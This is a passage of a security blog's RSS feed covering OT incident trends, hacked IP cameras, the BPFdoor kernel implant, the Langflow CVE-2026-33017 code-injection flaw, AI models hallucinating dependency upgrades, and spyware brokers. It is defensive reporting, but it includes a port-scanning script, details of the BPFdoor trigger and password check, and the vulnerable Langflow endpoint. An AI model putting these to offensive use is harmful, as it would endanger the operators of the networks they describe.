A second hypothesis points to a decrease in public reporting. While many jurisdictions have implemented stricter disclosure regulations in recent years, these rules do not universally apply to all regions experiencing frequent OT incidents. Furthermore, aggregated reporting in sectors like European critical infrastructure often anonymizes the data before it reaches the public. Legal liabilities also play a role. Following cases where organizations faced legal action over initial incident disclosures (such as Marquis initiating a lawsuit against its firewall vendor SonicWall in early 2025 for allegedly underestimating an incident's impact), legal counsel frequently advises companies to limit public details strictly to what the law mandates.

The most prominent theory links the decline to a temporary reduction in ransomware events, which drove the majority of major OT incidents in the early 2020s. Law enforcement actions in the United States and Russia recently disrupted the incentive structures and operations of major ransomware groups, providing a temporary reprieve for OT environments. However, Ginter anticipates that this ecosystem is stabilizing. As new entities step in to provide the necessary technical infrastructure, organizations should prepare for activity to normalize in 2026.

## Technical complexity and event severity

Beyond frequency, the technical complexity of public OT incidents in 2025 was generally lower than in previous years. While 2024 saw the discovery of multiple new OT-specific malware strains that demonstrated a capacity to write custom code implementing protocols for programmable logic controllers (PLCs) and remote terminal units, 2025 lacked similar novel developments. Threat actors primarily relied on established methods and general IT-focused tools rather than specialized industrial protocols.

Exceptions to this lower technical complexity were observed in geopolitical contexts, such as the ongoing Russia-Ukraine conflict. Additionally, unconfirmed reports suggested sophisticated knowledge of anti-aircraft systems was leveraged against facilities in Iran and Venezuela in 2025, though reliable public details remain limited.

Despite the drop in volume and technical novelty, the severity of the incidents that did occur remained high. The security event affecting Jaguar Land Rover, for instance, resulted in an estimated $1 billion in direct losses and a $2.5 billion impact on the broader United Kingdom economy.

Additionally, politically motivated threat actors demonstrated continued interest in critical infrastructure. In one instance, unauthorized parties gained widespread access to Poland's solar and wind infrastructure. While they rendered an undisclosed number of automation devices inoperable, the event did not ultimately disrupt power delivery.

Overall, while incidents with physical consequences dropped 25%, the report found that targeting of critical infrastructure without physical disruption doubled over the same period. The data indicates that while the total number of physical disruptions decreased last year, the underlying risk to operational technology remains significant, requiring sustained, proactive defense.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Nation-state actors increasingly target exposed IP cameras for intelligence and physical targeting</title>
        <link>https://security.shortwaves.live/blog/ac3fa6da-1e3a-4848-a2be-697ea295255b</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/ac3fa6da-1e3a-4848-a2be-697ea295255b</guid>
        <pubDate>Sat, 28 Mar 2026 03:14:14 GMT</pubDate>
        <description>Recent geopolitical conflicts have driven threat actors to leverage compromised internet-connected cameras and cyber-physical systems for operational visibility. Security researchers emphasize that organizations must actively manage shadow IT and secure legacy IoT devices to avoid exposure in opportunistic scanning campaigns.</description>
        <content:encoded><![CDATA[
            Internet-connected cameras have shifted from being primary targets for botnet operators to strategic assets in geopolitical conflicts. Russian and Ukrainian forces have accessed cameras to gather intelligence, while a joint US-Israeli mission reportedly relied on connected cameras prior to a fatal strike on Iran's leader. Furthermore, Iranian actors have leveraged compromised devices for operational support and physical targeting.

Reports from the Financial Times and Associated Press indicate that Israel and the US accessed Iran's traffic camera network, infrastructure the government used to monitor protesters, to track the movements of Ayatollah Ali Khamenei prior to a February 28 military strike. Following this event, Check Point Software reported that Iranian threat actors increased scanning and access attempts against camera networks in Israel, Qatar, Bahrain, Kuwait, the United Arab Emirates, and Cyprus.

This shift demonstrates that unauthorized access to IP cameras has evolved. Instead of merely co-opting devices for botnets, threat actors now prioritize intelligence gathering. Noam Moshe, a lead vulnerability researcher with cyber-physical security firm Claroty, notes a definitive transition toward controlling these devices for military, intelligence, and political purposes.

Sergey Shykevich, threat intelligence group manager at Check Point Research, explains that unauthorized camera access provides threat actors with direct visibility into targeted regions. He advises that leaving cameras unpatched or using default manufacturing credentials remains a primary security gap that organizations must close.

## Operational visibility through exposed devices

Historically, unauthorized access to cyber-physical systems was viewed as a serious but somewhat theoretical concern, with notable exceptions like the Stuxnet incident and the early stages of the Ukraine conflict. Today, accessing IP cameras to aid targeting and conduct battle damage assessment offers concrete, immediate value to nation-states.

As regional conflicts persist, Iranian-affiliated actors have broadened their scope to include private sector targets and industrial control systems, such as supervisory control and data acquisition (SCADA) systems and programmable logic controllers (PLCs), according to Moshe. Rather than strictly targeting specific organizations, these proxy groups conduct opportunistic scanning for exposed cyber-physical devices affiliated with particular countries. Organizations may find themselves caught in the geopolitical crossfire simply because their assets are externally exposed.

Security improvements by camera and Internet of Things (IoT) manufacturers have reduced the prevalence of easily accessible enterprise devices. Silas Cutler, a principal security researcher at Censys, points out that enterprise deployments are typically secured within private networks. The most frequently exposed hardware tends to be self-managed consumer devices.

## Securing legacy and shadow infrastructure

Legacy devices inadvertently connected to the public internet remain a primary source of exposure. Additionally, municipal traffic cameras made publicly accessible as a civic service can introduce security risks. Cutler recommends that organizations actively inventory their networks for shadow IT and outdated technology connected to the public internet.

When an unauthorized party discovers an exposed camera, they still need time to analyze the feed and determine its operational value. Moshe, who presented research on four vulnerabilities in Axis cameras at the Black Hat USA conference, explains that this analysis phase provides organizations with a window to detect and mitigate the exposure before the feed can be used effectively.

Maintaining defense in depth remains the most reliable strategy for protecting enterprise environments. Shykevich recommends that organizations regularly scan their own IP ranges to identify unprotected devices and apply missing patches. Establishing strong security hygiene, such as enforcing robust password policies and placing IoT devices behind firewalls with intrusion prevention capabilities, creates a resilient barrier against opportunistic scanning.
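
Scanning your own ranges can start small: a TCP connect sweep of common camera service ports across addresses you control. The sketch below uses only the Python standard library; the port list is an illustrative subset (HTTP/HTTPS, RTSP, and common NVR web ports), and it should only ever be pointed at infrastructure you are authorized to test.

```python
import socket
from concurrent.futures import ThreadPoolExecutor

# Illustrative subset: HTTP(S), RTSP, and common camera/NVR web interfaces.
CAMERA_PORTS = [80, 443, 554, 8000, 8080, 8443]


def open_ports(host: str, ports=CAMERA_PORTS, timeout: float = 1.0) -> list[int]:
    """Return the subset of ports accepting TCP connections on host (authorized scans only)."""
    found = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                found.append(port)
        except OSError:
            pass  # closed, filtered, or unreachable
    return found


def sweep(hosts: list[str]) -> dict[str, list[int]]:
    """Sweep many hosts concurrently and map each to its open ports."""
    with ThreadPoolExecutor(max_workers=32) as pool:
        return dict(zip(hosts, pool.map(open_ports, hosts)))
```

Any host reporting an open RTSP or web port that is not in the asset inventory is a candidate for the shadow-IT review described above.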
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Red Menshen evolves BPFdoor implant to maintain covert access in global telecommunications</title>
        <link>https://security.shortwaves.live/blog/f23b8e7e-785f-4f6e-a28a-89fcfd0b32f9</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/f23b8e7e-785f-4f6e-a28a-89fcfd0b32f9</guid>
        <pubDate>Sat, 28 Mar 2026 03:14:14 GMT</pubDate>
        <description>The advanced persistent threat group Red Menshen has upgraded its BPFdoor Linux kernel implant to better evade detection within telecommunications, government, and critical infrastructure networks. By hiding triggers in standard HTTPS and ICMP traffic, the malware presents new visibility challenges that require security teams to adopt proactive, kernel-level threat hunting.</description>
        <content:encoded><![CDATA[
            Threat actors operating under the Red Menshen designation (also tracked as Earth Bluecrow) have modified the BPFdoor malware to maintain highly stealthy persistence within global telecommunications systems, government networks, and critical infrastructure.

BPFdoor operates within the Linux kernel. It passively uses the Berkeley Packet Filter (BPF) to inspect incoming network traffic for a specific activation message, remaining dormant and difficult to observe until triggered. Researchers at Rapid7 report that Red Menshen has recently refined this listening mechanism. Since late last year, the group has implemented additional evasion techniques to remain undetected while operating near the core of global telecommunications subscriber traffic.

While earlier telemetry identified affected organizations in the Middle East and Africa, Rapid7's Christiaan Beek confirms that the campaign is global, with established persistence in the Asia-Pacific (APAC) region and Europe. Originally focused on telecommunications, the threat actor has also expanded its targeting to include government, critical infrastructure, and defense networks.

## Evolution of a sophisticated telecommunications backdoor

Previously, BPFdoor monitored a wide range of network packets for its activation sequence. The updated implant now strictly looks for its trigger within standard Hypertext Transfer Protocol Secure (HTTPS) requests. By hiding the activation sequence within Transport Layer Security (TLS) traffic, the malware easily passes through standard firewalls and traffic inspection tools. Once decrypted, the request appears benign to human analysts and automated security solutions.

BPFdoor specifically monitors the 26th byte offset in the incoming request; if the trigger value appears at this exact location, the implant activates. Trend Micro's analysis of a recent BPFdoor controller reveals that the threat actor also uses a hard-coded password and salt, verifying the MD5 hash before allowing the reverse shell to open. The controller supports TCP and ICMP protocols, allowing the operators to adapt their connection methods based on the specific network restrictions of the affected organization.
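
Based on the behavior described above, the activation check can be modeled as two stages: a magic byte at a fixed offset, then an MD5 over the supplied password and a hard-coded salt. The sketch below is a defensive model for reasoning about detections; the trigger value, salt, and password here are hypothetical placeholders, since the real constants vary per sample.

```python
import hashlib

TRIGGER_OFFSET = 26                # byte offset reported by researchers
TRIGGER_VALUE = 0x29               # hypothetical; varies per sample
SALT = b"example-salt"             # hypothetical stand-in for the hard-coded salt
EXPECTED_MD5 = hashlib.md5(b"example-password" + SALT).hexdigest()


def would_activate(packet: bytes, supplied_password: bytes) -> bool:
    """Model of the two-stage gate: magic byte at a fixed offset, then MD5(password + salt)."""
    if len(packet) <= TRIGGER_OFFSET or packet[TRIGGER_OFFSET] != TRIGGER_VALUE:
        return False  # stays dormant; packet looks like ordinary traffic
    return hashlib.md5(supplied_password + SALT).hexdigest() == EXPECTED_MD5
```

The model makes the detection problem explicit: everything before the final comparison is indistinguishable from benign traffic, which is why byte-level inspection of otherwise-normal TLS requests is required.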

Red Menshen also exercises precise control over multiple compromised servers within a single environment using a lightweight Internet Control Message Protocol (ICMP) channel. Rather than relying on traditional, easily detectable command-and-control (C2) servers for internal lateral movement, the malware transmits instructions between infected machines using ICMP pings. A specific value—`0xFFFFFFFF`—tells a specific machine to execute the enclosed command and terminate the propagation. Beek notes that this allows the threat actor to route commands through multiple network hops to a specific target machine, blending seamlessly into routine network diagnostic traffic.

## Deep reconnaissance and process masquerading

Red Menshen demonstrates an exceptional understanding of telecommunications infrastructure. Rapid7 observed the group performing extensive reconnaissance to understand the interconnections of specific equipment inside target networks. This deep operational knowledge allows them to move swiftly and deploy custom tooling, such as localized credential sniffers, once they establish a foothold.

The threat actor adapts its implants to mimic the specific environments of its targets. Knowing that many European and Asian telecommunications providers rely on HPE ProLiant servers and increasingly use Kubernetes to manage 5G core networks, BPFdoor actively disguises itself using legitimate service names and process behaviors associated with these specific technologies.

## Proactive hunting and defense strategies

BPFdoor’s combination of passive kernel-level listening, covert ICMP messaging, and highly tailored process masquerading makes it difficult for standard endpoint security solutions to detect. Protecting these environments requires security teams to actively hunt for anomalous internal traffic patterns.

To safeguard critical infrastructure, organizations should expand defensive visibility beyond the traditional perimeter. This includes monitoring high-port network activity on Linux systems, restricting unnecessary ICMP communication between internal servers, and hunting for unauthorized BPF filters attached to network interfaces. Triage recommends working closely with infrastructure teams to ensure that logging captures the specific kernel-level telemetry needed to identify this class of persistent threat. Telecommunications providers and critical infrastructure operators must anticipate these sophisticated techniques and validate their defensive posture continuously to maintain trust and operational resilience.
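One concrete hunt for the process masquerading described above is to compare each process's claimed name against the binary it was actually launched from. This is a minimal sketch assuming a Linux `/proc` layout; a mismatch is a lead for investigation, not proof of compromise.

```python
import os

def looks_masqueraded(comm: str, exe_path: str) -> bool:
    """Flag processes whose claimed name (/proc/<pid>/comm) does not match
    the basename of the /proc/<pid>/exe symlink target. Note that comm is
    truncated to 15 characters on Linux, which can cause false positives
    for long binary names."""
    return os.path.basename(exe_path) != comm

def hunt_proc(proc_root: str = "/proc"):
    """Illustrative hunting loop; reading every /proc entry requires root."""
    hits = []
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        try:
            comm = open(f"{proc_root}/{pid}/comm").read().strip()
            exe = os.readlink(f"{proc_root}/{pid}/exe")
        except OSError:
            continue  # process exited or access denied
        if looks_masqueraded(comm, exe):
            hits.append((pid, comm, exe))
    return hits
```

Pairing this with checks for unexpected BPF filters (for example, via `bpftool prog list` or socket-level inspection) gives broader coverage of this implant class.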
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Accelerated Threat Timelines: Managing Risks in AI Frameworks and Global Supply Chains</title>
        <link>https://security.shortwaves.live/blog/1632b9c8-5e82-42ca-8b78-fb895d53ac56</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/1632b9c8-5e82-42ca-8b78-fb895d53ac56</guid>
        <pubDate>Fri, 27 Mar 2026 03:14:07 GMT</pubDate>
        <description>Recent vulnerabilities in AI frameworks and regulatory shifts in hardware procurement demonstrate a shrinking window for defensive response. This report outlines active risks across software and physical supply chains, providing actionable mitigations to help security teams maintain resilient, verified environments.</description>
        <content:encoded><![CDATA[
The security scene today is defined by a shrinking window for defensive response, demonstrated by the rapid operationalization of a critical vulnerability in the Langflow AI framework. This development coincides with significant shifts in how national regulators and researchers view hardware and software supply chains, from the FCC’s restrictive new stance on foreign-made routers to fresh data showing that AI-assisted coding tools inadvertently introduce technical debt and vulnerabilities into enterprise environments. For security teams, the current operational environment shows that the pace of unauthorized access is accelerating. The tools organizations rely on for innovation, whether AI platforms or global hardware, require more rigorous operational oversight than ever before.

The most immediate risk involves CVE-2026-33017, a critical code injection vulnerability in Langflow, an open-source framework used to build AI agents. Within 24 hours of its disclosure, security researchers observed active scanning and unauthorized access attempts. This rapid turnaround prompted the Cybersecurity and Infrastructure Security Agency (CISA) to add the flaw to its Known Exploited Vulnerabilities catalog on Wednesday. The speed with which threat actors transitioned from a technical advisory to functional execution indicates a maturing capability; unauthorized parties were able to construct execution sequences even without a public proof-of-concept. This serves as a clear indicator that the gap between disclosure and potential exposure is now measured in hours, particularly for high-value AI workloads that frequently manage sensitive API keys and cloud credentials.

Volatility in the AI ecosystem extends beyond direct unauthorized utilization of the platforms themselves. New research released today by Sonatype suggests that organizations using advanced large language models like GPT-5 and Claude 4.5 to manage software dependencies may be operating under a false sense of security. An analysis of over 250,000 AI-generated upgrade recommendations found that nearly 28% of dependency upgrades were hallucinations: non-existent versions or fixes that provide no security value. Equally concerning is the tendency for these models to suggest "no change" when faced with uncertainty, effectively leaving hundreds of critical vulnerabilities unpatched in production code. The data shows that while AI reasoning capabilities are advancing, the models lack the real-time ecosystem intelligence needed to make safe remediation decisions, occasionally recommending versions that introduce more risk into the software supply chain.

As software supply chains face AI-driven instability, the physical infrastructure of the network is undergoing a regulatory shift. The Federal Communications Commission recently moved to halt approvals for specific foreign-made routers, effective March 23, citing unacceptable national security risks. The directive, influenced by findings related to threat groups like Volt Typhoon and Salt Typhoon, aims to prevent unauthorized parties from introducing access mechanisms or conducting large-scale data collection through consumer and small-office equipment. However, industry researchers warn of a potential side effect: the creation of a "zombie hardware" problem. If the market for new, approved devices becomes more constrained or expensive, small businesses and organizations may retain older, out-of-support routers far beyond their intended lifecycle, creating a different but equally demanding set of security gaps.

These supply chain complexities are further obscured by an opaque market of intermediaries. A report from the Atlantic Council details how a global network of brokers, resellers, and contractors helps the distribution of commercial surveillance technology, often bypassing international trade bans and transparency requirements. These third-party firms allow specialized intrusion capabilities to move into restricted markets by creating modular supply chains that hide the origin of the technology. For security teams, this means the tools used by sophisticated threat actors are increasingly decoupled from their original manufacturers, making "Know Your Vendor" requirements a critical, though difficult, component of modern risk management.

From a technical perspective, the Langflow vulnerability (CVE-2026-33017) affects a public build endpoint designed for convenience. The flaw resides in the way the application processes optional "data" parameters, passing Python code directly to the `exec()` function without sandboxing. This allows unauthenticated remote code execution. Because Langflow instances frequently store credentials for major cloud providers and AI services, a single instance of unauthorized access can enable immediate lateral movement. We recommend security teams monitor for anomalous network callbacks or unexpected shell executions originating from AI development environments.

For software engineering teams, the Sonatype research provides a clear path for mitigation: "grounding." When AI models were paired with real-time intelligence, such as version recommendation APIs and developer trust scores, critical risks were reduced by nearly 70%. Security teams should verify that any AI-assisted development tools used by their engineering departments do not operate in a vacuum, but are instead integrated with live registry data and vulnerability intelligence. Relying on an ungrounded model to suggest a security patch currently presents an elevated risk, frequently resulting in either a hallucinated version or the preservation of a known vulnerability.
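In practice, grounding can be as simple as vetting every AI-suggested upgrade against live data before it is applied. The sketch below uses hard-coded stand-ins for what would, in a real pipeline, be a registry API and a vulnerability feed; the package and version values are illustrative.

```python
# Stand-ins for live data sources (a registry API and a vulnerability feed).
KNOWN_VERSIONS = {"requests": ["2.31.0", "2.32.3"]}
VULNERABLE = {("requests", "2.31.0")}

def vet_suggestion(package: str, suggested: str) -> str:
    """Reject AI-suggested upgrades that are hallucinated or known-vulnerable."""
    if suggested not in KNOWN_VERSIONS.get(package, []):
        return "reject: hallucinated version"      # version does not exist
    if (package, suggested) in VULNERABLE:
        return "reject: known-vulnerable version"  # exists but unsafe
    return "accept"
```

A check of this shape is what separates an ungrounded suggestion from a grounded one: the model proposes, but live ecosystem data decides.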

Regarding network infrastructure, the FCC’s policy shift indicates that hardware origin is becoming a primary security consideration for sovereign and high-security environments. However, teams must not let the focus on hardware manufacturing distract from operational fundamentals. Research shows that most router-related security incidents still stem from administrative oversight (default credentials, exposed management interfaces, and delayed firmware updates) rather than built-in modifications. The most effective immediate defense is a return to basics: disabling remote management, enforcing strong credentials, and applying patches as soon as they are available, regardless of the device's country of origin.

Looking forward, the convergence of these trends demonstrates that standard verification models are struggling against rapid AI adoption and supply chain opacity. We are entering an era where software dependencies are suggested by hallucinating models and hardware is procured through complex webs of intermediaries. Success for defensive teams will increasingly depend on the ability to implement runtime detection and rigorous "Know Your Vendor" protocols. The incident with Langflow shows that organizations can no longer rely on a multi-day patching cycle for high-profile vulnerabilities; teams must have the visibility and segmentation in place to isolate affected workloads the moment an advisory is published.

As these developments progress, it remains to be seen how the FCC’s exemption process for new hardware will function or how quickly domestic manufacturing can fill the gap left by the new restrictions. Furthermore, while grounding AI models significantly reduces risk, the "human in the loop" remains a potential point of failure if reviewers rely on the same incomplete data as the models they oversee. Security teams should remain focused on bridging the gap between disclosure and remediation through automated response and live intelligence feeds.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Analyzing the Role of Intermediaries in the Commercial Surveillance Market</title>
        <link>https://security.shortwaves.live/blog/797f6f1d-8c52-43e7-a3d4-969978bec88c</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/797f6f1d-8c52-43e7-a3d4-969978bec88c</guid>
        <pubDate>Fri, 27 Mar 2026 03:14:07 GMT</pubDate>
        <description>The supply chain for commercial surveillance technology is growing increasingly complex due to a network of third-party intermediaries. A recent Atlantic Council report details how these brokers and resellers obscure visibility, complicating regulatory efforts while highlighting the need for stricter &quot;Know Your Vendor&quot; requirements.</description>
        <content:encoded><![CDATA[
            Understanding the commercial surveillance market has become increasingly complex due to the proliferation of intermediaries. These entities—including software resellers, vulnerability brokers, contractors, and regional partners—often enable government and private organizations to bypass transparency regulations and trade restrictions.

A March 18 report from the Atlantic Council details how these intermediaries allow the global distribution of offensive cyber capabilities (OCC). The researchers point to specific instances, such as a South African representative distributing Memento Labs' Dante software locally, and a third-party firm facilitating the sale of Passitora's surveillance technology to Bangladesh. This latter transaction occurred despite a lack of diplomatic relations between the relevant countries and existing trade bans, demonstrating how intermediaries navigate restricted markets.

Jen Roberts, associate director of the Cyber Statecraft Initiative at the Atlantic Council and a co-author of the report, notes that this ecosystem makes market analysis challenging.

"Intermediaries can drive down transparency efforts in the marketplace for offensive cyber capabilities like spyware by muddying supply chains and creating confusion for end buyers as to where a capability or component of a capability has come from," she says. She adds that intermediaries often support procurement for countries lacking strong in-house technical resources.

The broader commercial surveillance ecosystem continues to expand, driven by demand for law enforcement investigations, intelligence gathering, and the monitoring of political opposition. In 2025, a Google Threat Intelligence Group analysis found that, for the first time, commercial surveillance vendors accounted for more zero-day utilization than traditional state-sponsored groups. Recent shifts in US policy, including the reactivation of certain contracts and the removal of specific sanctions, also appear to have eased operational constraints for some surveillance technology vendors.

## The structural role of intermediaries

The Atlantic Council's "Mythical Beasts" report series indicates that intermediaries form the operational backbone of this market. By providing specialized procurement channels, they allow nations without domestic development capabilities to acquire gray-market surveillance software while insulating the original vendors from direct oversight.

Collin Hogue-Spears, senior director of solution management at Black Duck, explains that third-party brokers and resellers effectively bypass export controls through careful corporate structuring.

"Their corporate structures exist specifically to make export controls irrelevant," he notes. "The spyware market stopped being a vendor-to-government pipeline years ago. It has evolved into a modular supply chain where intermediaries fill every gap the buyer cannot fill alone: exploit engineering, operational training, deployment infrastructure, and most importantly, a legal paper trail that hides the origin."

Julian-Ferdinand Vögele, a principal threat researcher at Recorded Future, observes that these entities lower the barrier to entry by bundling software with training and support.

"Commercial spyware operates in the shadows by design," Vögele says. "Brokers and resellers enable its spread by connecting vendors and buyers, bundling tools with support or training, and expanding into new markets, while adding opacity, obscuring relationships, and leveraging jurisdictions."

## Regulatory efforts and transparency initiatives

Recognizing the risks to affected parties, including journalists, diplomats, and civil society members, international coalitions are working to establish oversight. In February 2024, the United Kingdom and France launched the Pall Mall Process, a multilateral initiative aimed at addressing the proliferation and irresponsible use of commercial cyber intrusion capabilities. This ongoing effort brings together government entities, industry partners, and policy experts to develop standard practices and safeguards.

In response to mounting regulatory pressure, some surveillance vendors have introduced internal compliance measures. For example, NSO Group announced the establishment of a human rights compliance program, though independent researchers remain cautious about the effectiveness of self-regulation in this sector.

Roberts notes that the Pall Mall Process is currently focused on drafting an industry code of practice, meaning comprehensive evaluation of the initiative will take time. In the interim, the Atlantic Council recommends practical defensive steps for organizations and governments: implementing strict "Know Your Vendor" requirements, mandating certification for capability brokers and resellers, and maintaining clear public registries of these entities.

Establishing visibility into the procurement chain is a necessary first step for security practitioners and policymakers attempting to secure environments against these tools.

"Transparency initiatives are key to regulating intermediaries and also the spyware industry more broadly," Roberts says. "It is difficult to ultimately regulate what one cannot observe."
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Evaluating AI models for software dependency decisions</title>
        <link>https://security.shortwaves.live/blog/e96f9a28-051e-424b-9813-85a7c8d6023a</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/e96f9a28-051e-424b-9813-85a7c8d6023a</guid>
        <pubDate>Fri, 27 Mar 2026 03:14:06 GMT</pubDate>
        <description>Recent analysis indicates that organizations relying on large language models for software dependency upgrades may inadvertently introduce or maintain vulnerabilities. Integrating real-time ecosystem intelligence is necessary to ensure AI-assisted development tools provide accurate, secure remediation guidance.</description>
        <content:encoded><![CDATA[
            Organizations integrating AI models into their software dependency workflows should evaluate how these tools source and verify their upgrade recommendations.

Recent research from Sonatype evaluated the performance of "frontier" models (the most advanced AI models available) when tasked with providing upgrade and patching guidance for software dependencies. The data shows that while these tools offer productivity benefits, they frequently generate fabricated or inaccurate recommendations, complicating vulnerability management and potentially increasing technical debt.

To measure this, Sonatype’s research team analyzed 36,870 unique dependency upgrade recommendations across Maven Central, npm, PyPI, and NuGet between June and August 2025. The study encompassed a total of 258,000 recommendations generated by seven AI models from Anthropic, OpenAI, and Google.

The initial phase of the study, published in February 2026 as part of the State of the Software Supply Chain report, focused on OpenAI's GPT-5. The analysis found that the model often recommended software versions, upgrade paths, or security fixes that did not exist, with nearly 28% of the recommended dependency upgrades classified as hallucinations.

A second phase of the study evaluated newer models equipped with enhanced reasoning capabilities, including GPT-5.2, Anthropic's Claude Sonnet 3.7 and 4.5, Claude Opus 4.6, and Google's Gemini 2.5 Pro and 3 Pro. While these models showed measurable improvements, they continued to generate a significant volume of fabricated recommendations. According to the report, these failures can lead to wasted AI spend, diverted developer time, unresolved vulnerability exposure, and increased technical debt before code reaches production.

## Evaluating recommendation accuracy

The research indicates that the primary limitation is not the reasoning capabilities of the models, which have advanced consistently. Instead, the models lack "ecosystem intelligence": the real-time dependency, vulnerability, compatibility, and enterprise policy context necessary to make safe remediation decisions.

Even the highest-performing models in the study fabricated approximately one out of every 16 dependency recommendations. To reduce hallucinations, frontier models often defaulted to a "no change" recommendation for about a third of the software components. However, this cautious approach resulted in the models failing to flag existing vulnerabilities. As a result, between 800 and 900 critical and high-severity vulnerabilities were left unaddressed in production code during the evaluation.

In other instances, the models recommended software versions that contained known vulnerabilities. The report noted that this occasionally put the AI stack itself at elevated risk, as the libraries used to train, fine-tune, orchestrate, and serve the models were updated to vulnerable versions based on the models' own guidance.

Sonatype co-founder and CTO Brian Fox noted that inaccurate guidance from AI models creates a subtle accumulation of technical debt. While organizations generally expect AI models to make occasional errors, the research indicates that flaws in dependency recommendations are becoming quietly integrated into standard development workflows.

"The most dangerous version of this problem isn't when the model gives you something obviously broken," Fox said. "It's when it gives you something plausible that preserves risk, misses the better upgrade path, and looks close enough to ship."

## Grounding AI with real-time intelligence

The data provides a clear path forward for organizations using AI-assisted development. The study demonstrated that "grounding" AI models with live intelligence and context produces significantly safer outcomes. When comparing the ungrounded frontier models to a hybrid approach that applied real-time intelligence at inference time, the hybrid method yielded a nearly 70% reduction in critical and high risks.

To test this methodology, researchers equipped GPT-5 Nano, the smallest model in the GPT-5 family, with a single function-calling tool backed by a version recommendation API. Supplying the model with ranked upgrade candidates, vulnerability counts, and developer trust scores led to a marked reduction in vulnerabilities compared to the ungrounded frontier models.

The report found that grounding not only prevents hallucinations but also successfully steers the model toward component versions with fewer known vulnerabilities when a perfect upgrade path is unavailable.
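The "steer toward fewer vulnerabilities" behavior can be sketched as a simple selection policy over the kind of ranked, annotated candidates a version-recommendation API might return. The data shape here is an assumption for illustration.

```python
def pick_upgrade(candidates):
    """Given upgrade candidates as (version, known_vuln_count) pairs,
    newest first, prefer the newest candidate with zero known issues;
    if none exists, fall back to the one with the fewest known issues."""
    clean = [version for version, vulns in candidates if vulns == 0]
    if clean:
        return clean[0]
    return min(candidates, key=lambda c: c[1])[0]
```

The point is that the model does not need to know the registry by heart; it only needs to reason over fresh, structured data supplied at inference time.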

Without live registry data, vulnerability intelligence, or compatibility context, AI models will continue to output errors that require engineering time to correct. Simply adding a human review step to the process is unlikely to prevent these issues if the reviewer is relying on the same incomplete data. As Fox explained, humans should set policies and constraints, but the systems providing recommendations must remain grounded in real-time software intelligence to support safe, effective decision-making.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Critical Vulnerability in Langflow AI Platform Requires Immediate Remediation</title>
        <link>https://security.shortwaves.live/blog/dca5435d-bee4-48df-b656-b4a7e2bef9cb</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/dca5435d-bee4-48df-b656-b4a7e2bef9cb</guid>
        <pubDate>Fri, 27 Mar 2026 03:14:06 GMT</pubDate>
        <description>A critical code injection flaw in the Langflow AI framework (CVE-2026-33017) allows unauthenticated remote code execution. With active scanning and unauthorized access attempts observed within 24 hours of disclosure, organizations must upgrade to version 1.9.0 and implement runtime defenses immediately.</description>
        <content:encoded><![CDATA[
            According to reporting from Dark Reading, a critical vulnerability in Langflow—an open-source framework for AI agent development—has been subject to active security incidents shortly after its initial disclosure.

On Wednesday, the Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2026-33017, a critical code injection flaw, to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability carries a 9.8 CVSS score and was first disclosed on March 17, 2026. Reports of unauthorized activity emerged almost immediately.

Cloud security vendor Sysdig observed access attempts less than 24 hours after the vulnerability was disclosed. Sysdig researchers noted that malicious actors were able to use the technical details provided in the advisory to quickly construct functional code execution sequences, even though no public proof-of-concept (PoC) code was initially available.

This rapid turnaround indicates that the window between vulnerability disclosure and active network scanning is now measured in hours, rather than days or weeks. Researchers noted that AI workloads are frequently targeted because they process high-value data and provide software supply chain access, often before comprehensive security measures are fully implemented.

## Technical details of CVE-2026-33017

Langflow is a widely used low-code framework for building and deploying AI agents. The vulnerability, CVE-2026-33017, originates in the `POST /api/v1/build_public_tmp/{flow_id}/flow` endpoint, which is designed to allow users to build public flows without authentication.

According to the Langflow GitHub advisory, if a user supplies the optional "data" parameter, the endpoint processes the provided flow data instead of the stored flow data from the local database. If this input contains arbitrary Python code within node definitions, the application passes the code directly to the `exec()` function without sandboxing. This mechanism grants unauthenticated remote code execution (RCE) to anyone who can reach the endpoint.
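The vulnerability class can be illustrated in miniature. This is emphatically NOT Langflow's actual code; it is a simplified sketch of the unsafe pattern (executing caller-supplied source) alongside a safer posture (dispatching only to pre-registered, reviewed components).

```python
def build_flow_unsafe(request_data: dict):
    """Unsafe pattern: request-supplied node "code" goes straight to exec(),
    granting any unauthenticated caller remote code execution."""
    for node in request_data.get("nodes", []):
        exec(node["code"])  # attacker-controlled input -> RCE

# Safer posture: never execute caller-supplied source; resolve node names
# against a fixed registry of reviewed handlers instead.
REGISTERED_NODES = {"uppercase": str.upper}

def build_flow_safe(request_data: dict, value: str) -> str:
    for node in request_data.get("nodes", []):
        handler = REGISTERED_NODES.get(node.get("name"))
        if handler is None:
            raise ValueError("unknown node type")
        value = handler(value)
    return value
```

Frameworks that must run user-defined code need real sandboxing (separate processes, restricted interpreters, or containers); a bare `exec()` on network input offers none.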

Langflow clarified that this issue is distinct from CVE-2025-3248, an earlier vulnerability that was previously utilized to distribute the Flodrix botnet.

The technical advisory for CVE-2026-33017 included specific details, such as the vulnerable endpoint path and the exact code injection mechanism. This transparency, while vital for defenders, provided enough information for unauthorized parties to formulate operational inputs without requiring extensive independent research.

## System impact and remediation

Researchers warn that unauthorized parties who successfully execute arbitrary code via CVE-2026-33017 can extract sensitive configuration data from vulnerable Langflow instances. Because these instances often store API keys and credentials for services like OpenAI, Anthropic, and AWS, exposure can enable lateral movement to connected databases and external cloud environments.

To protect your systems, we recommend the following immediate actions:

* Upgrade immediately: Langflow version 1.9.0 mitigates this vulnerability. System administrators should upgrade to the fixed version as soon as possible.

* Implement runtime detection: Utilize runtime security monitoring to identify unexpected shell execution or anomalous network callbacks originating from AI workloads.

